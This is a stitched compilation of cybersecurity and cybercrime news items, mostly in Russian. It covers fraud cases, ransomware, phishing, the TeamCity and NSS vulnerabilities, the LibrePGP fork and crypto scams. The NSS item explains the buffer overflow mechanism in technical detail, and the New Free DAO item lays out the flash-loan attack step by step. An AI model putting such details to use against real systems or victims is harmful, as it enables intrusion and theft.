Полицейскими в рамках расследования проведено 16 обысков. Изъяты компьютерная техника, телефоны, банковские карты, деньги и SIM-карты.
Следователями Главного следственного управления установлено 44 человека, которые пострадали от действий злоумышленников. Общая сумма убытков превышает 650 тысяч гривен.
Правоохранители завершили досудебное расследование и направили в суд обвинительный акт по ч. 1, 2 ст. 255, ч. 3 ст. 27 ч. 4 ст. 28 ч. 4 ст. 190, ч. 3 ст. 27, ч. 4 ст. 28 ч. 5 ст. 361 Уголовного Кодекса Украины. Членам преступной организации может грозить до двенадцати лет лишения свободы с конфискацией имущества.
Частный китайский банк Bank of Huludao раскрыл схему кражи и отмывания 1,8 млрд CNY (~$250 млн), принадлежащих инвесторам, к которой причастны два его топ-менеджера. Об этом сообщает The National Business Daily со ссылкой на судебные документы.
Согласно материалам дела, в августе 2020 бывший партийный секретарь банка Ли Юйлинь, и экс-исполняющий обязанности президента Ли Сяодун вместе с сообщником по фамилии Чэнь предположительно похитили 2,6 млрд CNY путем «урегулирования проблем с неисполнением обязательств».
В следующем месяце подозреваемые незаконно конвертировали более 1,8 млрд CNY в иностранную валюту и перевели эти средства на банковские счета компаний в Гонконге, находящиеся под их контролем.
В течение сентября и октября эта же группа лиц якобы занималась покупкой криптовалют через мессенджер WeChat, а затем перепродавала их за границу, используя других мерчантов.
Полученную прибыль сообщники конвертировали в доллары США и отправили на подконтрольные сотрудникам Bank of Huludao корпоративные счета.
Банковские карты, через которые совершались платежи, принадлежали гражданину Чэню. Его арестовали в августе 2022 года. В ходе судебного заседания обвиняемый признался в совершении преступления.
В документах сказано, что Чэнь заработал на этих махинациях около 100 000 CNY (~$13 700). Впоследствии он отказался от преступного дохода.
Суд приговорил его к двум годам и трем месяцам тюрьмы, а также штрафу в размере 2 млн CNY. Дело руководителей Bank of Huludao рассматривается в отдельном процессе, поэтому для них вердикт еще не вынесен.
nbd.com.cn/articles/2024-06-17/3430250.html
В РФ произошел сбой в работе крупных интернет сервисов
Не работали «ВКонтакте», МТС и «Ростелеком». Санкт-Петербургская биржа приостановила торги.
Сообщения о сбое в соцсети «В контакте» начали массово поступать на сервис downdetector.ru в 18-30.
По состоянию на 19:12 по Москве сервис зарегистрировал более 69 тысяч сообщений о неполадках. Большинство сообщивших о проблемах пользователей (54%) жаловались на сбои веб-сайта, 40% - на сбои в работе приложения, 6% - на проблемы профиля в соцсети. Больше всего о неполадках сообщали в Москве, Санкт-Петербурге, Нижнем Новгороде, также о проблемах в работе сервиса сообщали пользователи в Белоруссии.
«У части пользователей могут наблюдаться проблемы с загрузкой „ВКонтакте“, мы оперативно восстанавливаем работу», сообщили в компании.
В пресс-службе «Ростелекома» заявили , что магистральная сеть компании работает штатно. «Пользователи в Сургуте могут испытывать трудности с качеством услуги доступа в интернет, однако проблема вне зоны ответственности „Ростелекома“», — сказал представитель компании РБК.
Неполадки также затронули мессенджер Telegram, соцсеть Instagram, а также оператора Tele2. Санкт-Петербургская биржа приостановила торги из-за технического сбоя до выяснения обстоятельств.
В Европе продолжаются проблемы с поставками топлива из-за кибератак
Бельгийские и нидерландские компании продолжают испытывать трудности з погрузками и выгрузками нефти из-за кибератак.
Европейские нефтяные терминалы продолжают страдать от кибератак. Ранее ScurityLab сообщал об атаках на немецкие нефтяные компании Oiltanking и Mabanaft и терминалы в европейском центре торговли нефтью Амстердам-Роттердам- Антверпен. Теперь о кибератаках на свои системы сообщили бельгийская компания SEA-Invest и нидерландская Evos. Инциденты сорвали операции компаний в портах Европы и Африки.
По словам экспертов по кибербезопасности, на данный момент никаких свидетельство того, что кибератаки были координированными, обнаружено не было.
Как сообщили представители Evos, влияние инцидента ограничено только портами в Тернезене, Генте и на Мальте. Атаки на SEA-Invest и Evos могут существеннее повлиять на поставки топлива, чем январские атаки на немецкие нефтяные компании. В случае с Oiltanking и Mabanaft топливо удалось получить из альтернативных источников, и проблема не вышла за пределы страны.
Как сообщает NL Times, в настоящее время Evos испытывает трудности с погрузкой и выгрузкой нефти, но все порты компании в Нидерландах продолжают работать.
Крупнейший в Европе грузовой порт Riverlake в Роттердаме (Нидерланды) также сообщил об инциденте, в результате которого прекратилась разгрузка некоторых нефтяных барж.
Общее влияние кибератак заключается в замедлении поставок нефти в розничные точки из-за трудностей с заполнением танкеров-доставщиков. Как долго это будет продолжаться, пока неизвестно, поскольку общедоступной информации обо всех кибератаках, включая предыдущие инциденты в Германии, пока еще очень мало.
Ранее сообщалось , что немецкие нефтяные компании могли стать жертвами кибервымогательской группировки Black Cat, предположительно являющейся «реинкарнацией» нашумевших BlackMatter/DarkSide. Однако использовалось ли данное вымогательское ПО в атаках на нефтяные терминалы в Бельгии и Нидерландах, неизвестно.
Одновременный характер кибератак на фоне сложившейся геополитической ситуации наводит на мысль о координированной вредоносной кампании. Тем не менее, ИБ- эксперты призывают общественность не спешить с выводами, пока не появится больше фактов. Не исключено, что атаки были осуществлены с помощью фишинговых писем, разосланных ботами представителям европейской нефтяной промышленности, или стали результатом взлома определенного ПО, которыми пользуются все пострадавшие компании.
Теперь за ценную информацию об участниках государственных северокорейских группировок можно получить до $10 млн.
“Если у вас есть информация о лицах, связанных с северокорейскими государственными киберпреступными группировками, которые участвовали в атаках на критически важную инфраструктуру США, тем самым нарушая Закон о мошенничестве и злоупотреблении с использованием компьютеров, то вы можете претендовать на вознаграждение”,
Click to expand...
такое заявление было сделано Госдепартаментом США во вторник. В заявлении упоминались следующие группировки:
Andariel ;
APT38 ;
Bluenoroff ;
Guardians of Peace ;
Kimsuky ;
Lazarus .
Увеличенная награда будет добавлена к другой награде, объявленной в марте
этого года. Тогда Госдепартамент США предлагал до $5 млн. за информацию о
государственных хакерах из КНДР , которые атакуют криптовалютные биржи и
финансовые учреждения по всему миру.
Напомним, с северокорейскими государственными хакерами был связан крупнейший в
истории взлом криптобирж . ФБР связало инцидент с группировками Lazarus и
Bluenoroff, заявив что они несут ответственность за кражу $620 млн. в Ethereum
у компании Axie Infinity.
В наборе криптографических библиотек NSS (Network Security Services), развиваемых компанией Mozilla, [выявлена](https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have- happened.html) критическая [уязвимость](https://www.mozilla.org/en- US/security/advisories/mfsa2021-51/) ([CVE-2021-43527](https://security- tracker.debian.org/tracker/CVE-2021-43527)), которая может привести к выполнению кода злоумышленника при обработке цифровых подписей DSA или RSA- PSS, заданных с использованием метода кодирования DER (Distinguished Encoding Rules). Проблема, которой присвоено кодовое имя BigSig, устранена в выпусках NSS 3.73 и NSS ESR 3.68.1. Обновления пакетов в дистрибутивах доступны для Debian, RHEL, Ubuntu, SUSE, Arch Linux, Gentoo, FreeBSD. Пока недоступны обновления для Fedora.
Проблема проявляется в приложениях, использующих NSS для обработки цифровых подписей CMS, S/MIME, PKCS #7 и PKCS #12, или при верификации сертификатов в реализациях TLS, X.509, OCSP и CRL. Уязвимость может всплыть в различных клиентских и серверных приложениях с поддержкой TLS, DTLS и S/MIME, почтовых клиентах и PDF-просмотрщиках, использующих NSS-вызов CERT_VerifyCertificate() для проверки цифровых подписей.
В качестве примера уязвимых приложений упоминаются LibreOffice, Evolution и Evince. Потенциально проблема также может [затрагивать](https://developer.mozilla.org/en- US/docs/Mozilla/Projects/NSS/Overview) такие проекты, как Pidgin, Apache OpenOffice, Suricata, Curl, Сhrony, Red Hat Directory Server, Red Hat Certificate System, mod_nss для http-сервера Apache, Oracle Communications Messaging Server, Oracle Directory Server Enterprise Edition. При этом уязвимость не проявляется в Firefox, Thunderbird и Tor Browser, в которых для верификации используется отдельная библиотека mozilla::pkix, также входящая в состав NSS. Проблеме не подвержены и браузеры на основе Chromium (если они специально не собраны c NSS), которые использовали NSS до 2015 года, но затем были переведены на BoringSSL.
Уязвимость вызвана ошибкой в коде проверки верификации сертификатов в функции vfy_CreateContext из файла secvfy.c. Ошибка проявляется как при чтении клиентом сертификата с сервера, так и при обработке сервером сертификатов клиентов. В процессе проверки цифровой подписи, закодированной методом DER, NSS декодирует подпись в буфер, имеющий фиксированный размер, и передаёт данный буфер в модуль PKCS #11. При дальнейшей обработке, для подписей DSA и RSA-PSS некорректно проверяется размер, что приводит к переполнению буфера, выделенного под структуру VFYContextStr, если размер цифровой подписи превышает 16384 бит (под буфер выделяется 2048 байт, но не проверяется, что подпись может быть большего размера).
Содержащий уязвимость код прослеживается с 2003 года, но он не представлял угрозы до рефакторинга, проведённого в 2012 году. В 2017 году при реализации поддержки RSA-PSS была допущена та же ошибка. Для совершения атаки не требуется ресурсоёмкая генерация определённых ключей для получения нужных данных, так как переполнение происходит на стадии до проверки корректности цифровой подписи. Выходящая за границы часть данных записывается в область памяти, содержащую указатели на функции, что упрощает создание рабочих эксплоитов.
Уязвимость была выявлена исследователями из Google Project Zero в ходе экспериментов с новыми методами fuzzing-тестирования и является хорошей демонстрации того, как в широко протестированном известном проекте могут длительное время оставаться незамеченными тривиальные уязвимости:
• Код NSS сопровождается опытной командой, отвечающей за безопасность, применяющей современные методы тестирования и анализа ошибок. Действует несколько программ по выплате существенных вознаграждений за выявление уязвимостей в NSS.
• NSS был одним из первых проектов подключившихся в инициативе Google oss-fuzz и также проверялся в развиваемой Mozilla системе fuzzing-тестирования на базе libFuzzer.
• Код библиотеки многократно проверялся в различных статических анализаторах, в том числе с 2008 года отслеживался сервисом Coverity.
• До 2015 года NSS использовался в Google Chrome и независимо от Mozilla проверялся командой Google (с 2015 года Chrome перешёл на BoringSSL, но поддержка порта на базе NSS сохраняется).
Основные проблемы, из-за которых проблема долгое время оставалась незамеченной:
• NSS модульная библиотека и fuzzing-тестирование проводилось не в целом, а на уровне отдельных компонентов. Например, отдельно проверялся код декодирования DER и обработки сертификатов - в ходе fuzzing-а вполне мог быть получен сертификат, приводящий к проявлению рассматриваемой уязвимости, но его проверка не доходила до кода верификации и проблема не обнаруживала себя.
• При fuzzing-тестировании задавались жёсткие ограничения на размер вывода (10000 байт) при отсутствии подобных ограничений в NSS (многие структуры в штатном режиме могли иметь размер больше 10000 байт, поэтому для выявления проблем требовался больший объём входных данных). Для полноценной проверки лимит должен был быть 224-1 байт (16 МБ), что соответствует максимальному размеру сертификата, допустимого в TLS.
• Неверное представление об охвате кода fuzzing-тестированием. Уязвимый код активно тестировался, но с использованием fuzzer-ов, не способных сгенерировать необходимые входные данные. Например, fuzzer tls_server_target использовал предопределённый набор готовых сертификатов, что ограничивало проверку кода верификации сертификата только TLS-сообщениями и изменениями состояния протокола.
Аналитики из компании Cyble зафиксировали интересную [фишинговую кампанию](https://blog.cyble.com/2022/09/14/phishing-campaign-targets-greek- banking-users/), направленную против пользователей из Греции. Операторы этой аферы управляют фишинговыми сайтами, имитирующими официальный сайт Греческой налоговой службы. Сайты содержат кейлоггер, который ворует учетные данные и прочую информацию прямо по мере ввода.
Атака начинается с обычных фишинговых писем, в которых злоумышленники выдают себя за Греческую налоговую службу и сообщают пользователю хорошую новость: якобы после перерасчета ему положен возврат налогов на сумму 634,13 евро. В письмах сообщается, что автоматически отправить средства на банковский счет получателя не удалось из-за неких проблем.
[](https://xakep.ru/wp- content/uploads/2022/09/401889/portal-notice.jpg)
В итоге пользователя просят посетить сайт налоговой службы и пройти проверку самостоятельно. Письма содержат ссылки, ведущие несколько фишинговых подделок под официальный сайт Греческой налоговой службы (govgr-tax[.]me/ret/tax, govgreece-tax[.]me и mygov-refund[. ]me/ret/tax).
На фейковом сайте посетителей просят выбрать банковское учреждение, в которое нужно осуществить отправку средств. Жертвам предлагают семь вариантов на выбор, включая несколько крупных греческих банков. В зависимости от того, какой банк выберет пользователь, его перенаправят на другой фальшивый ресурс. В итоге страница входа в систему будет оформлена в стиле выбранного финансового учреждения.
[](https://xakep.ru/wp- content/uploads/2022/09/401889/national-bank.jpg)
Когда жертва приступит к вводу своих учетных данных в предложенную форму, сработает JavaScript-кейлоггер, присутствующий на странице, перехватит все нажатия клавиш и передаст данные своим операторам.
[](https://xakep.ru/wp- content/uploads/2022/09/401889/keylogger-code.jpg)
Таким образом, злоумышленники получат доступ к информации в режиме реального времени. Хуже того, даже если пользователь в последний момент одумается и не нажмет кнопку «Отправить», это уже не будет иметь никакого значения, ведь информация подвергается компрометации моментально, прямо по мере ее набора.
[](https://xakep.ru/wp- content/uploads/2022/09/401889/network-communication1.jpg)
Исследователи отмечают, что фишеры крайне редко используют кейлоггинг в режиме реального времени, и вероятно, эта атака, нацеленная на греков, может свидетельствовать о зарождении нового и крайне опасного тренда в среде хакеров. Такой способ атак может значительно повысить вероятность успешной кражи учтенных данных, а JavaScript-кейлоггер будет загружаться и работать даже в том случае, если жертва настроила браузер на блокировку сторонних трекеров.

](https://xakep.ru/2022/09/15/keylogger-phishing/)
Аналитики из компании Cyble зафиксировали интересную фишинговую кампанию, направленную против пользователей из Греции. Операторы этой аферы управляют фишинговыми сайтами, имитирующими официальный сайт Греческой налоговой службы. Сайты содержат кейлоггер, который ворует учетные данные и прочую...
 xakep.ru
Новая версия программы-вымогателя пока что в разработке.
Последние версии программ-вымогателей на базе CMD отличаются продуманностью и сложностью обнаружения, а также включают в свой набор функций кражу токенов и распространение червей. Новый вариант вымогательского ПО на базе CMD все еще находится в стадии разработки, но исследователи предупреждают, что опасное сочетание нескольких уровней обфускации и хитроумная интеграция вредоносных ссылок в легитимные сервисы делают его крайне серьезной угрозой.
YourCyanide восходит корнями к семейству программ-вымогателей GonnaCope, впервые обнаруженному в апреле, говорится в новом отчете группы поиска угроз Trend Micro . Вредонос пока ничего не шифрует (хотя исследователи утверждают, что это произойдет в ближайшее время), но переименовывает все нужные файлы, крадет информацию и похищает токены доступа из Chrome, Discord и Microsoft Edge. Кроме того, он самораспространяется.
В отличие от предшественников, у YourCyanide есть несколько новых тактик:
"Хотя YourCyanide и другие его варианты в настоящее время не так популярны, как другие семейства программ-вымогателей, он представляет собой интересную новинку в мире вымогательского ПО. Вредонос объединяет функции червя, программы-вымогателя и инфостилера в единую структуру вымогательского ПО среднего уровня", – говорится в отчете Trend Micro. "Также вероятно, что эти версии вымогательского ПО все еще находятся на стадии разработки. Поэтому нашей приоритетной задачей должны стать обнаружение и блокирование вредоносов семейства YourCyanide до того, как они смогут развиться дальше и нанести еще больший ущерб".
Напомним, не так давно специалисты Trend Micro обнаружили вредоносную кампанию Linux-вымогателя Cheerscrypt. Подобно другим известным вымогателям Cheerscrypt придерживается тактики двойного вымогательства – требует выкуп за восстановление зашифрованных файлов, угрожая в противном случае опубликовать похищенные у жертвы данные.
source: trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based- ransomware.html
Прокуратура Северного округа Калифорнии предъявила обвинения троим бывшим топ- менеджерам платформы криптокредитования Cred в сговоре с целью отмывания денег и мошенничества на сумму $783 млн.
Согласно судебным документам, Дэниел Шатт был совладельцем и CEO фирмы, Джозеф Подулка — финансовым директором, а Джеймс Александр — коммерческим директором.
Основанная другим физлицом в 2018 году Cred выдавала кредиты в долларах США под залог криптовалют и принимала депозиты в цифровых активах с обещанием доходности.
Согласно обвинению, не позднее марта 2020 года ответчики начали обманывать клиентов, предоставляя ложную информацию о кредитной и инвестиционной практике. Несмотря на крах компании, обвиняемые заверяли жертв в ее платежеспособности.
Шатт и Подулка предстали перед судом 2 мая 2024 года. Следующее заседание по делу запланировано на 8 мая. Дата суда над Александром пока не назначена.
В октябре 2020 года Cred сообщила о потере средств из-за мошенничества.
sc: justice[.]gov/usao-ndca/pr/former-ceo-cfo-and-cco-cred-llc-charged- alleged-multi-million-dollar-cryptocurrency
Прокуроры Днепропетровской областной прокуратуры направили в суд обвинительный акт в отношении организатора и семи участников преступной организации по факту мошенничества, совершенного в крупных размерах (ч. 2, 3 ст. 27, ч. 4 ст. 28, ч. 4 ст. 190, ч. 1, 2 ст. 255 УК Украины).
Расследованием установлено, что обвиняемые разработали схему мошеннического завладения средствами граждан.
Они обустроили оргтехникой офис в центре г. Кривой Рог и привлекли к работе 40 операторов.
Представители call-центра создавали фейковые аккаунты в популярной социальной сети, где показывали роскошную жизнь и высокий материальный доход клиентов букмекерской компании.
Заинтересованным в улучшении материального положения гражданам мошенники предлагали сделать онлайн-ставки. После выигрыша они убеждали потерпевших осуществлять дополнительные взносы для увеличения прибыли.
Впоследствии обвиняемые прекращали переписку, а деньги перечисляли на подконтрольные банковские счета.
Установлено более 20 пострадавших по всей Украине, среди которых военнослужащие и волонтеры.
Во время проведения более 30 санкционированных обысков в помещении офиса, по местам проживания и в автомобилях мужчин изъяты мобильные телефоны, компьютерная техника, банковские карты, флеш-носители информации, сим-карты, оружие, черновые записи со списками обманутых граждан и денежные средства в различных валютах.
Наложен арест на недвижимость и дорогостоящие авто обвиняемых.
Мероприятия по разоблачению проводили прокуроры совместно со следователями следственного управления ГУНП в Днепропетровской области при оперативном сопровождении сотрудников киберподразделения Управления СБУ в области.
Сегодня JetBrains настоятельно призвала клиентов исправить на своих локальных серверах TeamCity критическую уязвимость обхода аутентификации, которая может позволить злоумышленникам завладеть уязвимыми экземплярами с правами администратора. Отслеживаемый как CVE-2024-23917, этот критический недостаток влияет на все локальные версии TeamCity с 2017.1 по 2023.11.2 и может быть использован при атаках удаленного выполнения кода (RCE), которые не требуют взаимодействия с пользователем. "Мы настоятельно рекомендуем всем локальным пользователям TeamCity обновить свои серверы до версии 2023.11.3, чтобы устранить уязвимость", - заявили в JetBrains.
"Если ваш сервер общедоступен через Интернет и вы не можете немедленно
предпринять одно из вышеуказанных действий по устранению неполадок, мы
рекомендуем временно сделать его недоступным до завершения действий по
устранению неполадок".
Клиенты, которые не могут выполнить немедленное обновление, также могут
использовать плагин исправления безопасности для защиты серверов под
управлением TeamCity 2018.2+ и TeamCity 2017.1, 2017.2 и 2018.1. В то время
как компания заявляет, что все облачные серверы TeamCity были исправлены и нет
никаких доказательств того, что они подверглись атаке, еще предстоит выяснить,
был ли CVE-2024-23917 нацелен на взлом локальных серверов TeamCity,
подключенных к Интернету.
Shadowserver отслеживает более 2000 серверов TeamCity, открытых онлайн, хотя
нет возможности узнать, сколько из них уже исправлено.
Аналогичный недостаток обхода аутентификации, отслеживаемый как
CVE-2023-42793, был использован хакерской группой APT29, связанной со Службой
внешней разведки России (СВР), в широкомасштабных атаках RCE с сентября 2023
года. "Решив использовать CVE-2023-42793, программу разработки программного
обеспечения, агентства-разработчики оценивают, что SVR может извлечь выгоду из
доступа к жертвам, в частности, позволяя злоумышленникам компрометировать сети
десятков разработчиков программного обеспечения", - предупредила CISA.
С начала октября несколько банд вымогателей использовали одну и ту же
уязвимость для взлома корпоративных сетей. По данным Microsoft,
северокорейские хакерские группы Lazarus и Andariel также использовали
эксплойты CVE-2023-42793 для взлома сетей жертв, вероятно, в рамках подготовки
к атакам на цепочки поставок программного обеспечения.
JetBrains сообщает, что более 30 000 организаций по всему миру используют платформу для разработки и тестирования программного обеспечения TeamCity, включая такие известные компании, как Citibank, Ubisoft, HP, Nike и Ferrari.
Source: https://www.bleepingcomputer[.]com/news/security/jetbrains-warns-of- new-teamcity-auth-bypass-vulnerability
Вернер Кох (Werner Koch), основной разработчик и создатель проекта GnuPG (GNU Privacy Guard), [основал](https://lists.gnupg.org/pipermail/librepgp- discuss/2023/000000.html) проект LibrePGP, сосредоточенный на развитии [обновлённой спецификации](https://datatracker.ietf.org/doc/draft-koch- openpgp-2015-rfc4880bis/), альтернативной стандарту OpenPGP. Форк был создан в ответ на изменения, намеченные рабочей группой IETF для внесения в следующее обновление спецификации OpenPGP (RFC-4880) и воспринятые Кохом как сомнительные с точки зрения сохранения совместимости и обеспечения безопасности. Поддержавшие форк разработчики проектов GnuPG, RNP (реализация OpenPGP от Thunderbird) и Gpg4win опасаются, что намеченные изменения окажутся губительны для существующих внедрений приложений на базе OpenPGP, пользователи которых рассчитывают на стабильность спецификации в длительной перспективе и не готовы мириться с изменениями, нарушающими совместимость.
LibrePGP включает полезные улучшения, последние годы развивавшиеся для будущего варианта спецификации OpenPGP, но при этом исключает изменения, негативно влияющие на обеспечение совместимости. Например, по сравнению с действующим стандартом RFC-4880 в LibrePGP приняты такие возможности, как:
• Поддержка алгоритма шифрования Camellia (RFC-5581),
• Расширения ECC (Elliptic Curve Cryptography) для OpenPGP (RFC-6637).
• Обязательная поддержка хэшей SHA2-256 (SHA-1 и MD5 отнесены к категории не рекомендованных, а возможность расшифровки данных без версификации целостности отнесена к категории полностью устаревших).
• Увеличение до 256 бит размера проверочного слепка (fingerprint).
• Поддержка схемы цифровых подписей EdDSA и эллиптических кривых BrainpoolP256r1, BrainpoolP384r1, BrainpoolP512r1, Ed25519, Curve25519, Ed488 и X448.
• Поддержка алгоритма CRYSTALS-Kyber, устойчивого к подбору на квантовых компьютерах.
• Поддержка режимов аутентифицированного шифрования OCB (Offset codebook mode).
• Реализация пятой версии формата цифровых подписей с защитой метаданных.
• Поддержка расширенных субпакетов с цифровыми подписями.
________________
Основные элементы критики [новой спецификации](https://openpgp- wg.gitlab.io/rfc4880bis/) OpenPGP:
• Рабочая группа IETF вместо постепенного инкрементального обновления спецификации попыталась заново переизобрести стандарт и внести в него значительные изменения, нарушающие совместимость.
• Навязывание поддержки симметричного режима шифрования GCM (Galois/Counter Mode), который трудно реализовать правильно, игнорируя при этом режим OCB (Offset codebook mode), патенты на который истекли несколько лет назад.
• Добавление опциональных пакетов со случайным добавочным заполнением для защиты от анализа трафика. По мнению создателей LibrePGP, подобные пакеты с непроверяемым начальным случайным заполнением создают угрозу использования для создания скрытых каналов передачи данных и обхода систем предотвращения утечек данных. Ранее идея включения добавочного заполнения отвергалась, как являющаяся объектом не уровня шифрования, а уровня приложения.
• Применение модифицированной схемы шифрования ECDH (изменение формата OID), вместо использования уже описанного в RFC-6637 и реализованного в PGP и GnuPG варианта.
• Удаление некоторых используемых на практике возможностей, таких как классический метод отзыва ключей, флаг "m" для пометки MIME-данных и флаг "t" для отделения текстовых данных от бинарных (на смену флагу "t" пришёл флаг "u" для текста в кодировке UTF-8).
• Отказ включать в новый формат подписей защиту метаданных подписанного файла (например, можно не нарушая подписи изменить имя файла).
• Сомнительная возможность добавления "соли" к подписям (Salted signature) для усиления защиты от коллизионных атак с заданным префиксом. Значение с солью может использоваться как неотключаемый скрытый канал для передачи 32 байт данных в подписи.
• Смещение стандарта в сторону основного использования для online- коммуникации, игнорируя потребности для длительного хранения данных.
Сторонники OpenPGP уже [опубликовали](https://blog.pgpkeys.eu/critique- critique.html) критику на критику. В итоге, если не удастся найти компромисс раскол может привести к нарастанию несовместимостей в реализациях OpenPGP/LibrePGP. Частично для решения этой проблемы разработчики OpenPGP зафиксировали пятую версию формата подписей в виде совместимом с LibrePGP и перешли к работе над шестой версией.
As Iran celebrated the 44th anniversary of its revolution on Saturday, anti- government hackers briefly interrupted a televised speech by President Ebrahim Raisi. Instead, they aired the slogan “Death to Khamenei” and urged people to withdraw their money from government banks. Also, a voice shouted "Death to the Islamic Republic."
The Ali’s Justice (Edalat-e Ali) hacker group has claimed responsibility for hacking the live transmission of an Iranian state-run TV and radio station to disrupt and deface the speech of the Iranian president during the Revolution Day ceremonies.
The cyberattack was also confirmed by Germany-based Iranian journalist Bamdad Esmaili on his Twitter account. On the other hand, the Edalat-e Ali group used its Telegram channel to announce the hack. In a statement seen by Hackread.com, the group claimed responsibility for hacking TV and radio transmissions.
Sources:
[https://www.middleeastmonitor.com/2...s-online-hackers-interrupt-state-tv-
coverage/](https://www.middleeastmonitor.com/20230212-iran-marks-44th-
anniversary-of-revolution-as-online-hackers-interrupt-state-tv-coverage/)
https://www.hackread.com/iran-tv-hacked-revolution-day/
<https://www.arkansasonline.com/news/2023/feb/12/iran-celebrates-islamic-
revolution-anniversary/>
DeFi-протокол New Free DAO подвергся нескольким атакам мгновенного займа, после которых курс токена NFD обвалился на 99 %.
New Free DAO — это проект DeFi, работающий на основе Binance Smart Chain (BSC). Как написала в Твиттере компания CertiK, специализирующаяся на кибербезопасности в сфере блокчейна, злоумышленник воспользовался непроверенным смарт-контрактом и применил функцию «addMember()», чтобы добавить себя в качестве участника. Таким способом хакер провел три атаки мгновенного займа.
Сначала он занял 250 WBNB на $69 825 и обменял все средства на токены NFD. Хакер создал еще несколько контрактов, чтобы потребовать вознаграждение от раздачи токенов. Затем обменял полученное вознаграждение на WBNB, в результате получив 4 481 BNB. Из этих средств злоумышленник вернул кредит (250 BNB) и обменял 2 000 BNB на 550 000 BSC-USD. Спустя некоторое время злоумышленник вывел 400 BNB на миксер Tornado Cash.
Специалисты Certik сообщили, что хакер, совершивший атаку на New Free DAO, может иметь отношение к майской атаке на проект Neorder (N3DR). Компания по обеспечению безопасности блокчейнов, Beosin, тоже предположила, что за этими атаками могут стоять одни и те же люди.
Команда Beosin обнаружила еще одну уязвимость в протоколе New Free DAO, которая может использоваться для другого типа атаки с использованием мгновенных кредитов. Речь о манипулировании ценой, поскольку та рассчитывается в паре с использованием баланса стейблкоина USDT.
Подобные атаки становятся все более популярными среди хакеров. Недавно от атаки мгновенного займа пострадал протокол Nereus Finance, работающий на основе блокчейна Avalanche. Проект лишился стейблкоинов USDC на $371 000. В апреле такая же атака была совершена на кредитный сервис Inverse Finance, в результате которой злоумышленники вывели криптоактивы на сумму $15 млн. В июне хакеры повторили атаку и похитили $1.2 млн в BTC и USDT.
В октябре 2022 года Google Ads внесет изменения в требования к целевым страницам – туда будет добавлено положение о том, что качество рекламы на целевых страницах должно соответствовать стандартам Better Ads Standards.
Целевые страницы, не соответствующие этим стандартам, будут помечены в отчете о качестве рекламы, а все объявления, ведущие на такие страницы, будут отклонены.
Это нововведение является очередным шагом поддержки отраслевой инициативы «Coalition for Better Ads», членом которой Google является с 2016 года. Ее главная цель – устранение причин, побуждающих пользователей устанавливать блокировщики рекламы. Инициатива направлена на разработку и внедрение новых стандартов и технологий цифровой рекламы, позволяющих улучшить пользовательский опыт. В коалицию также входят такие крупные компании, как GroupM, News Corp, Microsoft, IAB и другие.
Напомним, в 2020 году браузер Google Chrome начал блокировать навязчивую видеорекламу, которая не соответствует стандартам «Coalition for Better Ads».
Источник: Справочный центр Google Ads
One of Ferrari's subdomains was hijacked yesterday to host a scam promoting fake Ferrari NFT collection, according to researchers.
What makes the scam particularly interesting is the fact that the luxury carmaker had earlier announced plans to launch NFTs in partnership with tech firm Velas.
The Ethereum wallet associated with the cryptocurrency scam appears to have collected a few hundred dollars before the hacked subdomain was shut down.
On Thursday, ethical hacker and bug bounty hunter Sam Curry reported seeing one of Ferrari's subdomains forms.ferrari.com hosting a fake NFT (Non-Fungible Token) scam.
An NFT, or Non-Fungible Token, is data stored on a cryptocurrency blockchain that a digital certificate has signed to prove that it is unique and cannot be copied.
Last year, Ferrari announced plans to launch NFT products in partnership with tech firm Velas, making this scam all very convincing.
The crypto scam titled "Mint your Ferrari" enticed visitors to buy NFT tokens, falsely touting that Ferrari introduced "a collection of 4,458 horsepower [sic] NFTs on the Ethereum network."
Spoiler: Source
https://www.bleepingcomputer[.]com/...hijacked-to-push-fake-ferrari-nft- collection/
Br
Командующий Отделом по борьбе с преступностью Бангкока (CSD) генерал-майор Монтри Тетхан сообщил, что в субботу утром в столице Таиланда был арестован 50-летний мужчина, который обвиняется в криптовалютном мошенничестве. В результате действий афериста местные жители и иностранцы понесли убытки в размере более чем 500 миллионов бат (более $14 миллионов).
По словам генерала-майора, гражданин Мана Джумуанг разыскивался на основании ордера на арест, выданного провинциальным судом Пхичита 23 декабря за участие в публичном мошенничестве с использованием криптовалют. По версии следствия подозреваемый, вместе с сообщниками, гражданами Таиланда и Вьетнама, выдавал себя за криптовалютного трейдера и занимался мошенничеством в 2018–2019 годах.
Мана Джумуанг убеждал своих жертв, что он эксперт в криптовалютной индустрии. Затем мошенник рассказывал, как получить высокую прибыль от инвестиций в криптовалюты. Через некоторое время он предлагал вложить деньги в проект Onecoin.
Таким образом на протяжении года мошенники убеждали людей инвестировать в
цифровую валюту Onecoin. Они утверждали, что у них есть онлайн-магазины для
продажи товаров за эту валюту. Купить за Onecoin якобы можно было все, начиная
от недвижимости, автомобилей и земельных участков до золота, пищевых добавок,
косметики и одежды.
По словам генерал-майора Монтри, жертвы верили обещаниям мошенников, что
смогут заработать прибыль в виде золота, автомобилей, недвижимости и
вкладывали деньги в Onecoin. Чтобы завоевать доверие жертв, мошенники первое
время выплачивали дивиденды инвесторам. Когда сумма вложенных денег составила
500 миллионов бат, мошенники перестали выплачивать дивиденды и выходить на
связь с инвесторами.
Пострадавшие от мошенничества написали заявление в полицию в нескольких участках. В конце 2019 года был выдан ордер на арест Маны Джумуанга. Он был доставлен в суд, затем освобожден под залог. В ходе расследования вскрылись новые факты и был выдан новый ордер на арест мошенника.
Уже прошло более трех лет с момента ареста лидера финансовой пирамиды OneCoin, а след от его преступлений тянется до сих пор. В 2020 году Сеть по борьбе с финансовыми преступлениями США (FinCEN) обвинила банк BNY Mellon в обработке транзакции на $137 млн для организаций, связанных с криптовалютной пирамидой OneCoin. В этом же году гражданин Сингапура был признан виновным и оштрафован на $72 000 за продвижение криптовалютной пирамиды OneCoin, собравшей более $4 млрд в разных странах мира.
• Source: https://www.bangkokpost.com/thailand/general/2237683
В начале этого года исследователям встретились два конкурирующих веб-скиммера на одном из французских сайтов. Теперь тенденцию продолжают обнаруженные Visa киберпреступники, пытающиеся увести прибыль у коллег по цеху.
В феврале 2021 года специалисты Malwarebytes наткнулись на два вредоносных скрипта, эксплуатирующих уязвимости в платформе Magento. Причём интересно, что второй по времени скрипт загружался из стороннего источника и пытался перехватить всё то, что собрал первый.
Теперь представители платёжной системы Visa тоже отметили тенденцию киберпреступников — пытаться отобрать у «коллег» добычу. Например, атакующие специально ищут уже заражённые веб-скиммерами ресурсы и внедряет туда собственные злонамеренные скрипты.
